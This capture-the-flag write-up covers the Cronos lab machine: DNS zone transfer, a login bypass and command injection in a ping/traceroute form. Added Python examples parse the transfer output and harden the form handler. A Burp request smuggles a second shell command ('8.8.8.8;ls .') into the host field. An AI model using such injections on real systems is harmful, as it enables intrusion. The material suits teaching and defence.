# Enumeration
The enumeration results show 3 open ports:
```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
So we are dealing with an Ubuntu machine that is hosting a web application. Port 53 is also open, with an ISC BIND service running on it. Let's research it a little bit more.
[ISC Bind 9](https://www.isc.org/bind/) has evolved to be a very flexible, full-featured DNS system. Whatever your application is, BIND 9 probably has the required features. As the first, oldest, and most commonly deployed solution, there are more network engineers who are already familiar with BIND 9 than with any other system.
I was having problems connecting to the web service so I added the IP to the /etc/hosts file. ![[Pasted image 20210413095138.png]]
# DNS Enumeration
Check out the video from HackerSploit and learn about DNS enumeration and zone transfers to understand the following lines.
```
$ dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.16.2-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 28 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 13 07:09:07 UTC 2021
;; XFR size: 7 records (messages 1, bytes 203)
```
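The zone transfer above succeeded because the name server answered an AXFR request from an arbitrary client. The script below is an added example (not part of the original write-up): it parses the text output of `dig axfr` into resource records, confirms the transfer was complete (a full AXFR starts and ends with the zone's SOA record), and turns the A records into the `/etc/hosts` lines the write-up adds by hand. The zone data embedded in it is a constructed copy of the output shown above; the function and variable names are my own.

```python
"""Parse `dig axfr` text output into DNS records and derive /etc/hosts entries.
Added example for the write-up; the sample zone data is constructed from the
output shown above."""
import re
from collections import namedtuple

Record = namedtuple("Record", "name ttl rclass rtype rdata")

# Constructed sample: the AXFR answer section from the write-up.
SAMPLE_AXFR = """\
; <<>> DiG 9.16.2-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 28 msec
;; XFR size: 7 records (messages 1, bytes 203)
"""

# One resource record per line: owner, TTL, class, type, rdata.
RR_LINE = re.compile(r"^(\S+)\s+(\d+)\s+(IN)\s+([A-Z]+)\s+(.*)$")


def parse_axfr(text):
    """Return the resource records in dig's AXFR output, skipping comments."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue  # dig banner, options and statistics lines
        m = RR_LINE.match(line)
        if m:
            name, ttl, rclass, rtype, rdata = m.groups()
            records.append(Record(name.rstrip("."), int(ttl), rclass, rtype, rdata))
    return records


def transfer_succeeded(records):
    """A complete AXFR is bracketed by two identical SOA records."""
    soa = [r for r in records if r.rtype == "SOA"]
    return len(soa) >= 2 and soa[0] == soa[-1]


def hosts_entries(records):
    """Group A records by address so each IP gets one /etc/hosts line."""
    by_ip = {}
    for r in records:
        if r.rtype == "A":
            names = by_ip.setdefault(r.rdata, [])
            if r.name not in names:
                names.append(r.name)
    return [f"{ip} {' '.join(names)}" for ip, names in by_ip.items()]


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    print(f"{len(recs)} records, complete transfer: {transfer_succeeded(recs)}")
    for line in hosts_entries(recs):
        print(line)
```

On the server side the fix is to restrict who may request a transfer; in BIND this is the `allow-transfer` option in `named.conf` (for example `allow-transfer { none; };` on a zone that has no secondaries, or a list of the secondaries' addresses). Running this parser against a `dig axfr` capture from your own servers is a quick way to confirm the zone no longer leaks.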
I have found a couple of domains linked to cronos. Let's add them to the /etc/hosts file too in order to access them in the browser.
![[Pasted image 20210413101836.png]]
# Admin.cronos.htb & SQLi
![[Pasted image 20210413101925.png]]
A quick SQLi check lets us in.
![[Pasted image 20210413102037.png]]
Two tools are running on the welcome.php page: *ping* and *traceroute*. From Burp, I have poked the application and discovered command injection.
### Request
```
POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://admin.cronos.htb
DNT: 1
Connection: close
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

command=traceroute&host=8.8.8.8%3Bls+.
```
I have URL-encoded a semicolon and appended the ls command for the current directory.
### Response
```
HTTP/1.1 200 OK
Date: Tue, 13 Apr 2021 08:01:47 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 527
Connection: close
Content-Type: text/html; charset=UTF-8

<html">
<head>
<title>Net Tool v0.1 </title>
</head>
<body>
<h1>Net Tool v0.1</h1>
<form method="POST" action="">
<select name="command">
<option value="traceroute">traceroute</option>
<option value="ping -c 1">ping</option>
</select>
<input type="text" name="host" value="8.8.8.8"/>
<input type="submit" value="Execute!"/>
</form>
config.php<br>
index.php<br>
logout.php<br>
session.php<br>
welcome.php<br>
<p><a href = "logout.php">Sign Out</a></p>
</body>
</html>
```
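The directory listing in the response shows that the `host` field reached a shell unchanged, so the `;` ended the traceroute command and started a second one. The write-up never shows the PHP behind welcome.php, so the following is an added example of my own, not the target's code: it models the assumed vulnerable pattern (both form fields concatenated into one shell string, consistent with the `ping -c 1` option value) next to a hardened version that maps `command` to a fixed argument vector, validates `host` as an IP address or hostname, and never invokes a shell. It also includes a small metacharacter check of the kind a WAF rule or application log filter would use to flag such requests. The two form submissions embedded in it are constructed from the request above; all function names are mine.

```python
"""Vulnerable vs. hardened handling of the Net Tool form fields.
Added example; the target's PHP source is not shown in the write-up, so the
'vulnerable' function only models the behaviour observed in the response."""
import ipaddress
import re

# Constructed from the write-up's request (URL-decoded).
LEGIT_INPUT = {"command": "traceroute", "host": "8.8.8.8"}
INJECTED_INPUT = {"command": "traceroute", "host": "8.8.8.8;ls ."}

# The two options the form offers, as fixed argument vectors (assumed layout).
ALLOWED_COMMANDS = {
    "traceroute": ["traceroute"],
    "ping": ["ping", "-c", "1"],
}

# RFC 1123 style hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)

# Characters that give user input control over a shell command line.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\\]")


def vulnerable_command_line(form):
    """Assumed vulnerable pattern: fields glued into one string for a shell.
    With shell=True (or PHP's shell_exec) everything after ';' runs as a
    second command, which is exactly what the directory listing shows."""
    return f"{form['command']} {form['host']}"


def is_valid_host(host):
    """Accept an IPv4/IPv6 literal or a syntactically valid hostname only."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(host))


def looks_like_injection(host):
    """Detection helper: True when the field carries shell metacharacters."""
    return SHELL_META.search(host) is not None


def hardened_command(form):
    """Return an argv list for subprocess.run(argv) (no shell), or raise."""
    argv = ALLOWED_COMMANDS.get(form.get("command", ""))
    if argv is None:
        raise ValueError("unknown command")
    host = form.get("host", "")
    if not is_valid_host(host):
        raise ValueError("invalid host")
    # A list is passed to execve directly; ';' would be a literal argument,
    # but validation has already rejected it.
    return argv + [host]


def is_rejected(form):
    """Convenience wrapper so callers can check rejection without try/except."""
    try:
        hardened_command(form)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print("vulnerable:", vulnerable_command_line(INJECTED_INPUT))
    print("flagged:", looks_like_injection(INJECTED_INPUT["host"]))
    print("hardened argv:", hardened_command(LEGIT_INPUT))
    print("injected rejected:", is_rejected(INJECTED_INPUT))
```

The key design choice is the allow-list: the client-supplied `command` value selects one of two fixed argument vectors instead of being executed as text, and the only free-form field is checked against what a host should look like before it becomes an argument. The metacharacter check is deliberately separate; it is useful for logging and alerting but is not what keeps the hardened handler safe, since a hostname validator already excludes every character in that set.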